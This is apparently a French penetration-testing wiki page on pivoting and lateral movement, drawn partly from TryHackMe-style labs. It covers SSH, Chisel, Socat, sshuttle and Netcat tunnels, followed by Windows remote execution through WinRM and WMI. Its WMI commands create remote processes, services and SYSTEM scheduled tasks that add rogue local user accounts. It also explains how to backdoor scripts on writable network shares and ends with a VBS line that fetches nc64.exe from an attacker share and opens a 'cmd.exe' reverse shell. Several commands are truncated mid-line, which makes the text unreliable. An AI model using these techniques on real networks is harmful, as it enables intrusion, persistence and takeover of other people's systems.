La machine intermédiaire doit être munie d'un serveur SSH et vous devez avoir des accès SSH pour vous connecter dessus.
#### Local port forwarding [](https://wiki.neopipe.fr/uploads/images/gallery/2024-02/zKFimage.png) ``` ssh -LVous devriez pouvoir accéder à votre service via **localhost:<LOCAL\_PORT>**
**Le tunnel restera ouvert tant que la session SSH est active.**
#### Remote port forwarding [](https://wiki.neopipe.fr/uploads/images/gallery/2024-02/capture-decran-du-2024-02-06-21-03-23.png) ``` ssh -RCette commande exposera le service du **DST** sur le **LISTENER**.
## Chisel #### Prérequis - Trouvez un port non utilisé (absent de cette liste) : ```bash (netstat -punta || ss -n -t -p -u) ``` #### Installation Voici le lien github de l'outil : - [https://github.com/jpillora/chisel/](https://github.com/jpillora/chisel/) Vous pouvez installer l'outil sur le poste intermédiaire si vous avez les droits **root** grâce à la commande suivante : ```bash curl https://i.jpillora.com/chisel! | bash ``` Téléchargez le binaire (version 19.1) : ```bash curl -O -L https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz && gunzip chisel_1.9.1_linux_amd64.gz && mv chisel_1.9.1_linux_amd64 chisel && chmod +x chisel ``` #### Port forwarding - Sur le pc intermédiaire, lancez la commande suivante : ```bash ./chisel server -pSur la machine de l'attaquant vous pourrez accéder au service via **localhost:<LOCAL\_PORT>**
#### Reverse port forwarding - Sur le poste de l'attaquant : ```bash ./chisel serverSur la machine de l'attaquant vous pourrez accéder au service via **localhost:<LOCAL\_PORT>**
## Socat #### Installation Voici le Github du projet : - [https://github.com/3ndG4me/socat](https://github.com/3ndG4me/socat) Pour télécharger le binaire : ```bash curl -o socat -L https://github.com/3ndG4me/socat/releases/download/v1.7.3.3/socatx64.bin && chmod +x socat ``` Sinon, installez le depuis les dépôts : ```bash apt install -y socat ``` #### Port forwarding ```bash socat TCP-LISTEN:Le service de la machine **REMOTE** sera exposé sur le **LOCAL\_PORT** de la machine qui exécute la commande.
## Sshuttle Ce logiciel permet d'établir une connexion VPN à travers un tunnel SSH sans nécessiter de privilège root sur la machine distante : - [https://github.com/sshuttle/sshuttle](https://github.com/sshuttle/sshuttle) ```bash sshuttle -vrTous le trafic sera routé par le réseau distant !
Voici un exemple : ```bash sshuttle -vr username@target-ip 10.1.1.0/24 ``` ## Netcat Il est possible de faire du port forwarding avec Netcat grâce à certaines options. Depuis la machine attaquante : ```bash nc -lv --broker --max-conns 2 ``` Et sur la machine intermédiaire : ```bash nc -nvPsExec utilise le partage administratif **ADMIN$**, fonctionne avec Samba sur le port **445** et requiert les droits **Administrateurs**.
#### WinRM L'avantage de **WinRM** est qu'il ne nécessite que le privilège **Remote Management Users** pour fonctionner et qu'il est actif et présent sur les systèmes Windows par défaut. On peut utiliser l'**exécutable** : ```powershell winrs.exe -u:Il est aussi possible de le faire en powershell :
Tout d'abord, il faut créer un objet **PSCredential** : ```powershell $username = 'Administrator'; $password = 'Mypass123'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; ``` Pour ensuite établir une **session WMI** : ```powershell $Opt = New-CimSessionOption -Protocol DCOM $Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop ``` #### Création d'un processus à distance avec WMI On peut ensuite créer un **processus** sur l'hôte distant : ```powershell $Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere"; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $Command } ```Vous n'aurez pas de retour sur la commande exécutée avec WMI, alors assurez-vous de ne pas vous tromper dans la syntaxe !
#### Création d'un service à distance avec WMI Si on le souhaite, on peut aussi créer un **service** sur l'hôte distant : ```powershell Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{ Name = "THMService2"; DisplayName = "THMService2"; PathName = "net user munra2 Pass123 /add"; # Your payload ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process StartMode = "Manual" } ``` On peut gérer et **démarrer le service** de cette manière : ```powershell $Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'THMService2'" Invoke-CimMethod -InputObject $Service -MethodName StartService ``` Et on peut **arrêter** et **supprimer** le service comme cela : ```powershell Invoke-CimMethod -InputObject $Service -MethodName StopService Invoke-CimMethod -InputObject $Service -MethodName Delete ``` #### Création d'une tâche planifiée à distance avec WMI On peut **créer une tâche planifiée** sur l'hôte distant grâce à WMI : ```powershell # Payload must be split in Command and Args $Command = "cmd.exe" $Args = "/c net user munra22 aSdf1234 /add" $Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "THMtask2" Start-ScheduledTask -CimSession $Session -TaskName "THMtask2" ``` Si on le souhaite, on peut **supprimer** la tâche avec cette commande : ```powershell Unregister-ScheduledTask -CimSession $Session -TaskName "THMtask2" ``` #### Installer un paquet MSI à distance avec WMI On peut le faire avec la commande suivante : ```powershell wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\myinstaller.msi ``` Ou en Powershell comme ceci : ```powershell Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false} ``` #### Resource sur un partage réseau Parfois, pour ne pas déployer un logiciel ou un script sur tous les postes d'un parc, les administrateurs mettent des fichiers exécutables ou des scripts sur des partages réseau et crééent des raccourcis sur le bureau ou la barre des tâches des postes. [](https://wiki.neopipe.fr/uploads/images/gallery/2024-02/wa2image.png)Cependant, si vous avez un accès en écriture à l'exécutable ou au script pointé, vous pouvez le modifier et attendre qu'il soit exécuté par un autre utilisateur afin de pivoter sur son système.
A noter que la resource, une fois exécutée, est copiée dans le répertoire temporaire du poste exécutant **%tmp%**.
- Si la resource pointée est un **script VBS**, vous pourriez le modifier de la sorte : ```vbscript CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\10.10.28.6\myshare\nc64.exe %tmp% & %tmp%\nc64.exe -e cmd.exe